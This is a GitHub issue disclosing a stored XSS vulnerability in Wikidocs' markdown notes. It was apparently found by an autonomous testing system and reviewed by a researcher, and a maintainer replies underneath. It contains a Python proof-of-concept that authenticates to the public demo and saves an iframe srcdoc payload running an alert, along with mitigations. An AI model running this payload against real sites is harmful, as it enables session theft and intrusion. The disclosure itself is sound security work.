Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

XBOW Security Report - #216

Open
1 task
niemand-sec opened this issue Nov 22, 2024 · 1 comment
Open
1 task

XBOW Security Report - #216

niemand-sec opened this issue Nov 22, 2024 · 1 comment
Labels
bug Something isn't working

Comments

@niemand-sec
Copy link

Describe your issue

Disclaimer

This vulnerability was detected using XBOW, a system that autonomously finds and exploits potential security vulnerabilities. The finding has been thoroughly reviewed and validated by a security researcher before submission. While XBOW is intended to work autonomously, during its development human experts ensure the accuracy and relevance of its reports.

Description

A stored Cross-Site Scripting (XSS) vulnerability was identified in the markdown notes functionality of the application. By injecting an iframe html element containing embedded JavaScript, an attacker can execute arbitrary JavaScript in the context of the victim's browser upon viewing the uploaded image.

Mitigations

  • Avoid reflecting user-defined HTML or JavaScript code in pages.
  • If possible, configure proper CSP headers so even if an attacker is able to inject JS code in a page it will not be able to execute.

Impact

  • Session Hijacking: Attackers can steal session cookies, allowing them to impersonate legitimate users.
  • Data Theft: Access to sensitive information such as personal data, credentials, or financial details.

Device and settings

Wikidocs

Steps to reproduce

  1. Execute the following python code to create the PoC:
import requests

url = 'https://demo.wikidocs.it/'
session = requests.Session()

# Authenticate
auth_data = {
    'document': 'aa',
    'password': 'demo'
}
session.post(f'{url}/submit.php?act=authentication', data=auth_data)

# Create the XSS payload that worked before
content = '''# Test Page

<iframe srcdoc="<img src=x onerror=alert('XSS')>">
'''

payload = {
    'revision': '0',
    'document': 'xss',
    'content': content
}

r3 = session.post(f'{url}/submit.php?act=content_save', data=payload)
print("Created XSS page at:", f"{url}/xss")
  1. Access the malicious page:

image

Screenshots (optional)

No response

Extra fields

  • I'd like to work on this issue
@niemand-sec niemand-sec added the bug Something isn't working label Nov 22, 2024
@ffiesta
Copy link
Contributor

ffiesta commented Nov 23, 2024

Hi to all, i know we need to protect wikidocs with some security, ... but in my head wikidocs is like a personal library, wiki faq ... and only has 2 password (1 to read and another to write) normally user only share the read password or don't.

If this is a personal wiki system i think we need to protect very well writing password!

I don't say that we won't protect jpg or javascript or php, ... but @niemand-sec, can you show any security issues in wikidocs without use write password?

  • Its more important solve security issues that won't need write password.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@niemand-sec @ffiesta